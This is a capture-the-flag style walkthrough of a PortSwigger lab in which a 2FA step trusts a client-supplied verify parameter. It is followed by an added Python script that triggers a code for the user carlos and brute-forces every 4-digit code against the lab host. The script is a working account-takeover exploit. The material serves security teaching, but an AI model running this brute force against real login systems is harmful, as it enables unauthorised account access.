This lab's two-factor authentication is vulnerable due to its flawed logic. To solve the lab, access Carlos's "My account" page.
You also have access to the email server to receive your 2FA verification code.
1. With Burp proxying the traffic, log in to your own account and watch the 2FA step. Notice that in the POST /login2 request, the verify parameter is used to determine which user's account is being accessed. That is the flaw: the server trusts a client-supplied username instead of binding the second factor to the session that already passed the first one.
2. Send the GET /login2 request to Burp Repeater. Change the value of the verify parameter to carlos and send the request. This ensures that a temporary 2FA code is generated for Carlos, even though Carlos never entered a password.
3. Send the POST /login2 request to Burp Intruder.
4. In Intruder, set the verify parameter to carlos and add a payload position to the mfa-code parameter. Brute-force the verification code. Because the lab applies no rate limiting or attempt lockout, the whole numeric code space can be tried; the one response that differs from the rest (a redirect rather than the re-rendered login form) identifies the valid code.
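Steps 2 to 4 as a script, added here as an illustration and not part of the lab write-up or PortSwigger's own material. It uses only the standard library. Everything not on the page is an assumption and is labelled as such in the code: the lab hostname placeholder, a session cookie copied from Burp after authenticating as your own user up to the 2FA prompt, verify being sent as a cookie alongside it, a 4-digit numeric code, and a 302 redirect to /my-account marking the correct guess. The request sender is passed in as a function so the brute-force loop itself can be exercised offline.

```python
"""Added example (not the lab's or PortSwigger's code): script the GET /login2
trigger and the POST /login2 brute force against the 2FA broken logic lab.
Assumptions: lab host below, session cookie from Burp, verify sent as a
cookie, 4-digit numeric codes, 302 -> /my-account on the correct code."""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterator, Optional, Tuple

LAB_URL = "https://YOUR-LAB-ID.web-security-academy.net"  # assumption: your lab host
TARGET_USER = "carlos"
CODE_DIGITS = 4  # assumption: the lab issues 4-digit numeric codes

Response = Tuple[int, Optional[str]]  # (HTTP status, Location header if any)
Sender = Callable[[str, Optional[bytes]], Response]


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Hand the 3xx back to the caller instead of following it; the redirect
    is the signal that separates the one correct code from the rest."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


OPENER = urllib.request.build_opener(NoRedirect)


def candidate_codes(digits: int = CODE_DIGITS) -> Iterator[str]:
    """Every zero-padded numeric code: 0000 .. 9999 for four digits."""
    for n in range(10 ** digits):
        yield str(n).zfill(digits)


def login2_body(mfa_code: str) -> bytes:
    """Form body of the POST /login2 request carrying one guessed code."""
    return urllib.parse.urlencode({"mfa-code": mfa_code}).encode()


def is_valid_code(resp: Response) -> bool:
    """Assumed lab behaviour: a wrong code re-renders the form (200); the
    right one redirects the now-verified session to My account (302)."""
    status, location = resp
    return status == 302 and location is not None and "my-account" in location


def make_sender(base_url: str, session: str, verify: str) -> Sender:
    """Build a function that sends one /login2 request with verify= pointed
    at the victim (assumption: verify travels as a cookie next to session)."""
    cookie = f"session={session}; verify={verify}"

    def send(method: str, body: Optional[bytes]) -> Response:
        req = urllib.request.Request(base_url + "/login2", data=body, method=method)
        req.add_header("Cookie", cookie)
        if body is not None:
            req.add_header("Content-Type", "application/x-www-form-urlencoded")
        try:
            with OPENER.open(req, timeout=10) as r:
                return r.status, r.headers.get("Location")
        except urllib.error.HTTPError as e:  # raised for the unfollowed 3xx
            return e.code, e.headers.get("Location")

    return send


def trigger_code_for(send: Sender) -> Response:
    """Step 2: GET /login2 with verify=carlos makes the server mint a fresh
    code for Carlos although Carlos never passed the first factor."""
    return send("GET", None)


def brute_force_code(send: Sender, digits: int = CODE_DIGITS) -> Optional[str]:
    """Steps 3-4: POST every candidate mfa-code with verify still set to
    carlos; the first request answered with a redirect carries the right code."""
    for code in candidate_codes(digits):
        if is_valid_code(send("POST", login2_body(code))):
            return code
    return None


if __name__ == "__main__":
    session_cookie = "PASTE-YOUR-SESSION-COOKIE"  # assumption: taken from Burp
    send = make_sender(LAB_URL, session_cookie, TARGET_USER)
    trigger_code_for(send)
    print("valid mfa-code:", brute_force_code(send))
```

Run it after logging in as your own user and copying the session cookie from Burp; the script then performs the same GET-then-Intruder sequence, and the redirect check plays the role of sorting Intruder results by status code. If the lab's codes are not 4 digits, adjust CODE_DIGITS; the candidate generator and loop are otherwise unchanged.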